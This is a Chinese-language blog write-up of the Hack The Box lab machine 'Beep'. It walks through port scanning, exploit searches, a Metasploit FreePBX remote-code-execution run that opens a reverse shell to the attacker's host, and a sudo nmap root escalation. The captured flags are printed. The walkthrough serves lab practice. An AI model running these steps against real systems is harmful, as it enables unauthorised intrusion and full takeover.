HTB Beep[Hack The Box HTB靶场]writeup系列5

HTB靶场 专栏收录该内容
7 篇文章 1 订阅

本题是retire机器的第五台了

目录

0x00 靶场信息

0x01 信息搜集

0x02 业务探测

80端口主页:elastix freepbx

80端口mail业务:roundcube webmail

10000端口:webmin

0x03 漏洞分析

elastix

roundcube

 webmin

0x03 web攻击

roundcube

webmin

elastic

0x04 提权


0x00 靶场信息

我们可以看到这个靶机point值是20,难度在1-4之间,属于初级-中级之间的水平吧。

0x01 信息搜集

我们先做下端口扫描,看下结果如下:

root@kali:~# nmap -T5 -A -v 10.10.10.7
Starting Nmap 7.80 ( https://nmap.org ) at 2020-02-02 21:39 EST
NSE: Loaded 151 scripts for scanning.
NSE: Script Pre-scanning.
Initiating NSE at 21:39
Completed NSE at 21:39, 0.00s elapsed
Initiating NSE at 21:39
Completed NSE at 21:39, 0.00s elapsed
Initiating NSE at 21:39
Completed NSE at 21:39, 0.00s elapsed
Initiating Ping Scan at 21:39
Scanning 10.10.10.7 [4 ports]
Completed Ping Scan at 21:39, 0.31s elapsed (1 total hosts)
Initiating Parallel DNS resolution of 1 host. at 21:39
Completed Parallel DNS resolution of 1 host. at 21:39, 0.26s elapsed
Initiating SYN Stealth Scan at 21:39
Scanning 10.10.10.7 [1000 ports]
Discovered open port 110/tcp on 10.10.10.7
Discovered open port 25/tcp on 10.10.10.7
Discovered open port 3306/tcp on 10.10.10.7
Discovered open port 80/tcp on 10.10.10.7
Discovered open port 22/tcp on 10.10.10.7
Discovered open port 993/tcp on 10.10.10.7
Discovered open port 995/tcp on 10.10.10.7
Discovered open port 111/tcp on 10.10.10.7
Discovered open port 443/tcp on 10.10.10.7
Discovered open port 143/tcp on 10.10.10.7
Discovered open port 10000/tcp on 10.10.10.7
Discovered open port 4445/tcp on 10.10.10.7
Increasing send delay for 10.10.10.7 from 0 to 5 due to 423 out of 1057 dropped probes since last increase.
Completed SYN Stealth Scan at 21:39, 7.34s elapsed (1000 total ports)
Initiating Service scan at 21:39
Scanning 12 services on 10.10.10.7
Completed Service scan at 21:42, 167.37s elapsed (12 services on 1 host)
Initiating OS detection (try #1) against 10.10.10.7
Retrying OS detection (try #2) against 10.10.10.7
Initiating Traceroute at 21:42
Completed Traceroute at 21:42, 0.41s elapsed
Initiating Parallel DNS resolution of 2 hosts. at 21:42
Completed Parallel DNS resolution of 2 hosts. at 21:42, 0.90s elapsed
NSE: Script scanning 10.10.10.7.
Initiating NSE at 21:42
Completed NSE at 21:42, 37.18s elapsed
Initiating NSE at 21:42
Completed NSE at 21:45, 156.81s elapsed
Initiating NSE at 21:45
Completed NSE at 21:45, 0.00s elapsed
Nmap scan report for 10.10.10.7
Host is up (0.28s latency).
Not shown: 988 closed ports
PORT      STATE SERVICE    VERSION
22/tcp    open  ssh        OpenSSH 4.3 (protocol 2.0)
| ssh-hostkey: 
|   1024 ad:ee:5a:bb:69:37:fb:27:af:b8:30:72:a0:f9:6f:53 (DSA)
|_  2048 bc:c6:73:59:13:a1:8a:4b:55:07:50:f6:65:1d:6d:0d (RSA)
25/tcp    open  smtp       Postfix smtpd
|_smtp-commands: beep.localdomain, PIPELINING, SIZE 10240000, VRFY, ETRN, ENHANCEDSTATUSCODES, 8BITMIME, DSN, 
80/tcp    open  http       Apache httpd 2.2.3
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-server-header: Apache/2.2.3 (CentOS)
|_http-title: Did not follow redirect to https://10.10.10.7/
|_https-redirect: ERROR: Script execution failed (use -d to debug)
110/tcp   open  pop3       Cyrus pop3d 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_pop3-capabilities: UIDL TOP STLS PIPELINING IMPLEMENTATION(Cyrus POP3 server v2) AUTH-RESP-CODE USER EXPIRE(NEVER) APOP LOGIN-DELAY(0) RESP-CODES
111/tcp   open  rpcbind    2 (RPC #100000)
143/tcp   open  imap       Cyrus imapd 2.3.7-Invoca-RPM-2.3.7-7.el5_6.4
|_imap-capabilities: QUOTA THREAD=ORDEREDSUBJECT NO X-NETSCAPE URLAUTHA0001 NAMESPACE OK CHILDREN IDLE UIDPLUS LISTEXT LIST-SUBSCRIBED CONDSTORE ACL MAILBOX-REFERRALS MULTIAPPEND ANNOTATEMORE THREAD=REFERENCES RENAME LITERAL+ Completed ID SORT=MODSEQ STARTTLS ATOMIC RIGHTS=kxte IMAP4 SORT IMAP4rev1 CATENATE UNSELECT BINARY
443/tcp   open  ssl/https?
|_ssl-date: 2020-02-03T03:44:17+00:00; +1h01m28s from scanner time.
993/tcp   open  ssl/imap   Cyrus imapd
|_imap-capabilities: CAPABILITY
995/tcp   open  pop3       Cyrus pop3d
3306/tcp  open  mysql      MySQL (unauthorized)
4445/tcp  open  upnotifyp?
10000/tcp open  http       MiniServ 1.570 (Webmin httpd)
|_http-favicon: Unknown favicon MD5: 74F7F6F633A027FA3EA36F05004C9341
| http-methods: 
|_  Supported Methods: GET HEAD POST OPTIONS
|_http-title: Site doesn't have a title (text/html; Charset=iso-8859-1).
Aggressive OS guesses: Linux 2.6.9 - 2.6.24 (95%), Linux 2.6.9 - 2.6.30 (95%), Linux 2.6.27 (likely embedded) (95%), Linux 2.6.20-1 (Fedora Core 5) (95%), Linux 2.6.5 - 2.6.12 (95%), Linux 2.6.18 (95%), Linux 2.6.18 - 2.6.32 (95%), Linux 2.6.22 - 2.6.23 (95%), Linux 2.6.27 (95%), Linux 2.6.30 (95%)
No exact OS matches for host (test conditions non-ideal).
Uptime guess: 0.527 days (since Sun Feb  2 09:06:18 2020)
Network Distance: 2 hops
TCP Sequence Prediction: Difficulty=203 (Good luck!)
IP ID Sequence Generation: All zeros
Service Info: Hosts:  beep.localdomain, 127.0.0.1, example.com

Host script results:
|_clock-skew: 1h01m27s

TRACEROUTE (using port 8080/tcp)
HOP RTT       ADDRESS
1   408.95 ms 10.10.14.1
2   408.45 ms 10.10.10.7

NSE: Script Post-scanning.
Initiating NSE at 21:45
Completed NSE at 21:45, 0.00s elapsed
Initiating NSE at 21:45
Completed NSE at 21:45, 0.00s elapsed
Initiating NSE at 21:45
Completed NSE at 21:45, 0.00s elapsed
Read data files from: /usr/bin/../share/nmap
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 376.74 seconds
           Raw packets sent: 1502 (67.588KB) | Rcvd: 1127 (46.584KB)

开放的端口比较多,扫出来12个端口, 看起来有点像渗透测试用的多业务靶机,漏洞应该不少。

看到开了80,那么就先扫描一下目录

我的网络状态确实太慢了,就扫描了一下主要的部分。也可以看到有大量的目录存在。

0x02 业务探测

80端口主页:elastix freepbx

80端口mail业务:roundcube webmail

10000端口:webmin

0x03 漏洞分析

elastix

root@kali:~# searchsploit elastix
---------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                        |  Path
                                                                                                                                                                      | (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Elastix - 'page' Cross-Site Scripting                                                                                                                                 | exploits/php/webapps/38078.py
Elastix - Multiple Cross-Site Scripting Vulnerabilities                                                                                                               | exploits/php/webapps/38544.txt
Elastix 2.0.2 - Multiple Cross-Site Scripting Vulnerabilities                                                                                                         | exploits/php/webapps/34942.txt
Elastix 2.2.0 - 'graph.php' Local File Inclusion                                                                                                                      | exploits/php/webapps/37637.pl
Elastix 2.x - Blind SQL Injection                                                                                                                                     | exploits/php/webapps/36305.txt
Elastix < 2.5 - PHP Code Injection                                                                                                                                    | exploits/php/webapps/38091.php
FreePBX 2.10.0 / Elastix 2.2.0 - Remote Code Execution                                                                                                                | exploits/php/webapps/18650.py
---------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

roundcube

root@kali:~# searchsploit roundcube
---------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                        |  Path
                                                                                                                                                                      | (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
Roundcube 1.2.2 - Remote Code Execution                                                                                                                               | exploits/php/webapps/40892.txt
Roundcube Webmail - Multiple Vulnerabilities                                                                                                                          | exploits/php/webapps/11036.txt
Roundcube Webmail 0.1 - 'index.php' Cross-Site Scripting                                                                                                              | exploits/php/webapps/28988.txt
Roundcube Webmail 0.1 - CSS Expression Input Validation                                                                                                               | exploits/php/webapps/30877.txt
Roundcube Webmail 0.2 - Cross-Site Scripting                                                                                                                          | exploits/php/webapps/33473.txt
Roundcube Webmail 0.2-3 Beta - Code Execution                                                                                                                         | exploits/php/webapps/7549.txt
Roundcube Webmail 0.2b - Remote Code Execution                                                                                                                        | exploits/php/webapps/7553.sh
Roundcube Webmail 0.3.1 - Cross-Site Request Forgery / SQL Injection                                                                                                  | exploits/php/webapps/17957.txt
Roundcube Webmail 0.8.0 - Persistent Cross-Site Scripting                                                                                                             | exploits/php/webapps/20549.py
Roundcube Webmail 1.1.3 - Directory Traversal                                                                                                                         | exploits/php/webapps/39245.txt
Roundcube rcfilters plugin 2.1.6 - Cross-Site Scripting                                                                                                               | exploits/linux/webapps/45437.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

另外通过roundcube的sql文件分析

可以看到roundcube显示的版本是0.3.1

 webmin

root@kali:~# searchsploit webmin
---------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
 Exploit Title                                                                                                                                                        |  Path
                                                                                                                                                                      | (/usr/share/exploitdb/)
---------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------
DansGuardian Webmin Module 0.x - 'edit.cgi' Directory Traversal                                                                                                       | exploits/cgi/webapps/23535.txt
Webmin - Brute Force / Command Execution                                                                                                                              | exploits/multiple/remote/705.pl
Webmin 0.9x / Usermin 0.9x/1.0 - Access Session ID Spoofing                                                                                                           | exploits/linux/remote/22275.pl
Webmin 0.x - 'RPC' Privilege Escalation                                                                                                                               | exploits/linux/remote/21765.pl
Webmin 0.x - Code Input Validation                                                                                                                                    | exploits/linux/local/21348.txt
Webmin 1.5 - Brute Force / Command Execution                                                                                                                          | exploits/multiple/remote/746.pl
Webmin 1.5 - Web Brute Force (CGI)                                                                                                                                    | exploits/multiple/remote/745.pl
Webmin 1.580 - '/file/show.cgi' Remote Command Execution (Metasploit)                                                                                                 | exploits/unix/remote/21851.rb
Webmin 1.850 - Multiple Vulnerabilities                                                                                                                               | exploits/cgi/webapps/42989.txt
Webmin 1.900 - Remote Command Execution (Metasploit)                                                                                                                  | exploits/cgi/remote/46201.rb
Webmin 1.910 - 'Package Updates' Remote Command Execution (Metasploit)                                                                                                | exploits/linux/remote/46984.rb
Webmin 1.920 - Remote Code Execution                                                                                                                                  | exploits/linux/webapps/47293.sh
Webmin 1.920 - Unauthenticated Remote Code Execution (Metasploit)                                                                                                     | exploits/linux/remote/47230.rb
Webmin 1.x - HTML Email Command Execution                                                                                                                             | exploits/cgi/webapps/24574.txt
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP)                                                                                                    | exploits/multiple/remote/1997.php
Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (Perl)                                                                                                   | exploits/multiple/remote/2017.pl
phpMyWebmin 1.0 - 'target' Remote File Inclusion                                                                                                                      | exploits/php/webapps/2462.txt
phpMyWebmin 1.0 - 'window.php' Remote File Inclusion                                                                                                                  | exploits/php/webapps/2451.txt
webmin 0.91 - Directory Traversal                                                                                                                                     | exploits/cgi/remote/21183.txt
---------------------------------------------------------------------------------------------------------------------------------------------------------------------- ----------------------------------------

0x03 web攻击

roundcube

我测试发现0.3.1的csrf漏洞是有效的,sql注入无法重现

_action为除了login之外任意值的时候,我们可以设置_url为我们需要打开的页面。这样就构成了csrf漏洞

webmin

webmin的几个远程执行漏洞都需要提供用户名密码

未授权执行命令的漏洞测试无法执行

msf5 > use exploit/47230                                                                                                                                              
msf5 exploit(47230) > show options                                                                                                                                                                             
                                                                                                                                                                                                               
Module options (exploit/47230):                                                                                                                                                                                
                                                                                                                                                                                                               
   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.7       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      10000            yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   TARGETURI  /                yes       Base path for Webmin application
   VHOST                       no        HTTP server virtual host


Payload options (cmd/unix/reverse_python):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST  10.10.14.20      yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port
   SHELL  /bin/bash        yes       The system shell to use.


Exploit target:

   Id  Name
   --  ----
   0   Webmin <= 1.910


msf5 exploit(47230) > run

[*] Started reverse TCP handler on 10.10.14.20:4444 
[-] Exploit aborted due to failure: not-vulnerable: Target is not vulnerable.
[*] Exploit completed, but no session was created.

elastic

在msf中查找一下elastic的漏洞

msf5 > search elastix

Matching Modules
================

   #  Name                                 Disclosure Date  Rank    Check  Description
   -  ----                                 ---------------  ----    -----  -----------
   0  exploit/unix/http/freepbx_callmenum  2012-03-20       manual  No     FreePBX 2.10.0 / 2.9.0 callmenum Remote Code Execution

只有一个,我就直接配置执行:

msf5 > use unix/http/freepbx_callmenum
msf5 exploit(unix/http/freepbx_callmenum) > 

showmsf5 exploit(unix/http/freepbx_callmenum) > show options 

Module options (exploit/unix/http/freepbx_callmenum):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   EXTENSION  0-100            yes       A range of Local extension numbers
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS                      yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      80               yes       The target port (TCP)
   SSL        false            no        Negotiate SSL/TLS for outgoing connections
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf5 exploit(unix/http/freepbx_callmenum) > set extension 200-300
extension => 200-300
msf5 exploit(unix/http/freepbx_callmenum) > set rhosts 10.10.10.7
rhosts => 10.10.10.7
msf5 exploit(unix/http/freepbx_callmenum) > set rport 443
rport => 443
msf5 exploit(unix/http/freepbx_callmenum) > set ssl true
ssl => true
msf5 exploit(unix/http/freepbx_callmenum) > show options 

Module options (exploit/unix/http/freepbx_callmenum):

   Name       Current Setting  Required  Description
   ----       ---------------  --------  -----------
   EXTENSION  200-300          yes       A range of Local extension numbers
   Proxies                     no        A proxy chain of format type:host:port[,type:host:port][...]
   RHOSTS     10.10.10.7       yes       The target host(s), range CIDR identifier, or hosts file with syntax 'file:<path>'
   RPORT      443              yes       The target port (TCP)
   SSL        true             no        Negotiate SSL/TLS for outgoing connections
   VHOST                       no        HTTP server virtual host


Exploit target:

   Id  Name
   --  ----
   0   Automatic Target


msf5 exploit(unix/http/freepbx_callmenum) > run

[*] Started reverse TCP double handler on 10.10.14.20:4444 
[*] 10.10.10.7:443 - Sending evil request with range 200
[*] 10.10.10.7:443 - Sending evil request with range 201
[*] 10.10.10.7:443 - Sending evil request with range 202
[*] 10.10.10.7:443 - Sending evil request with range 203
[*] 10.10.10.7:443 - Sending evil request with range 204
[*] 10.10.10.7:443 - Sending evil request with range 205
[*] 10.10.10.7:443 - Sending evil request with range 206
[*] 10.10.10.7:443 - Sending evil request with range 207
[*] 10.10.10.7:443 - Sending evil request with range 208
[*] 10.10.10.7:443 - Sending evil request with range 209
[*] 10.10.10.7:443 - Sending evil request with range 210
[*] 10.10.10.7:443 - Sending evil request with range 211
[*] 10.10.10.7:443 - Sending evil request with range 212
[*] 10.10.10.7:443 - Sending evil request with range 213
[*] 10.10.10.7:443 - Sending evil request with range 214
[*] 10.10.10.7:443 - Sending evil request with range 215
[*] 10.10.10.7:443 - Sending evil request with range 216
[*] 10.10.10.7:443 - Sending evil request with range 217
[*] 10.10.10.7:443 - Sending evil request with range 218
[*] 10.10.10.7:443 - Sending evil request with range 219
[*] 10.10.10.7:443 - Sending evil request with range 220
[*] 10.10.10.7:443 - Sending evil request with range 221
[*] 10.10.10.7:443 - Sending evil request with range 222
[*] 10.10.10.7:443 - Sending evil request with range 223
[*] 10.10.10.7:443 - Sending evil request with range 224
[*] 10.10.10.7:443 - Sending evil request with range 225
[*] 10.10.10.7:443 - Sending evil request with range 226
[*] 10.10.10.7:443 - Sending evil request with range 227
[*] 10.10.10.7:443 - Sending evil request with range 228
[*] 10.10.10.7:443 - Sending evil request with range 229
[*] 10.10.10.7:443 - Sending evil request with range 230
[*] 10.10.10.7:443 - Sending evil request with range 231
[*] 10.10.10.7:443 - Sending evil request with range 232
[*] 10.10.10.7:443 - Sending evil request with range 233
[*] 10.10.10.7:443 - Sending evil request with range 234
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo cSKXu5Bg1FmgoFlA;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket B
[*] B: "sh: line 2: Connected: command not found\r\nsh: line 3: Escape: command not found\r\ncSKXu5Bg1FmgoFlA\r\n"
[*] Matching...
[*] A is input...
[*] Command shell session 2 opened (10.10.14.20:4444 -> 10.10.10.7:59073) at 2020-02-03 11:16:17 -0500
[*] 10.10.10.7:443 - Sending evil request with range 235
[*] 10.10.10.7:443 - Sending evil request with range 236
ls
[*] 10.10.10.7:443 - Sending evil request with range 237
^C[-] Exploit failed [user-interrupt]: Interrupt 
[-] run: Interrupted
msf5 exploit(unix/http/freepbx_callmenum) > sessions 

Active sessions
===============

  Id  Name  Type            Information  Connection
  --  ----  ----            -----------  ----------
  2         shell cmd/unix               10.10.14.20:4444 -> 10.10.10.7:59073 (10.10.10.7)

msf5 exploit(unix/http/freepbx_callmenum) > sessions 2
[*] Starting interaction with 2...

pwd
/tmp
id
uid=100(asterisk) gid=101(asterisk)
cd /home
pwd
/home
ls
fanis
spamfilter
ls -l
total 12
drwxrwxr-x 2 fanis      fanis      4096 Apr  7  2017 fanis
drwx------ 2 spamfilter spamfilter 4096 Apr  7  2017 spamfilter
cd fanis
ls -l
total 4
-rw-rw-r-- 1 fanis fanis 33 Apr  7  2017 user.txt
cat user.txt
aeff3def0c765c2677b94715cffa73ac

我们可以看到已经取得了webshell,拿到了user的flag。 

0x04 提权

这个提权比较简单,直接sudo -l就可以看到nmap,标准提权命令

sudo -l
Matching Defaults entries for asterisk on this host:
    env_reset, env_keep="COLORS DISPLAY HOSTNAME HISTSIZE INPUTRC KDEDIR
    LS_COLORS MAIL PS1 PS2 QTDIR USERNAME LANG LC_ADDRESS LC_CTYPE LC_COLLATE
    LC_IDENTIFICATION LC_MEASUREMENT LC_MESSAGES LC_MONETARY LC_NAME LC_NUMERIC
    LC_PAPER LC_TELEPHONE LC_TIME LC_ALL LANGUAGE LINGUAS _XKB_CHARSET
    XAUTHORITY"

User asterisk may run the following commands on this host:
    (root) NOPASSWD: /sbin/shutdown
    (root) NOPASSWD: /usr/bin/nmap
    (root) NOPASSWD: /usr/bin/yum
    (root) NOPASSWD: /bin/touch
    (root) NOPASSWD: /bin/chmod
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /sbin/service
    (root) NOPASSWD: /sbin/init
    (root) NOPASSWD: /usr/sbin/postmap
    (root) NOPASSWD: /usr/sbin/postfix
    (root) NOPASSWD: /usr/sbin/saslpasswd2
    (root) NOPASSWD: /usr/sbin/hardware_detector
    (root) NOPASSWD: /sbin/chkconfig
    (root) NOPASSWD: /usr/sbin/elastix-helper
sudo nmap --interactive

Starting Nmap V. 4.11 ( http://www.insecure.org/nmap/ )
Welcome to Interactive Mode -- press h <enter> for help
nmap> !sh
id
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
cd /root
ls -l
total 16248
-rw------- 1 root root     6025 Apr  7  2017 anaconda-ks.cfg
-r-xr-xr-x 1 root root   190461 Aug 10  2011 elastix-pr-2.2-1.i386.rpm
-rw-r--r-- 1 root root    18433 Apr  7  2017 install.log
-rw-r--r-- 1 root root        0 Apr  7  2017 install.log.syslog
-rw-r--r-- 1 root root        1 Apr  7  2017 postnochroot
-rw------- 1 root root       33 Apr  7  2017 root.txt
-r-xr-xr-x 1 root root 16358730 Oct 31  2011 webmin-1.570-1.noarch.rpm
cat root.txt
d88e006123842106982acce0aaf453f0

 

  • 0
    点赞
  • 0
    评论
  • 0
    收藏
  • 一键三连
    一键三连
  • 扫一扫,分享海报

©️2020 CSDN 皮肤主题: 岁月 设计师:pinMode 返回首页
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、C币套餐、付费专栏及课程。

余额充值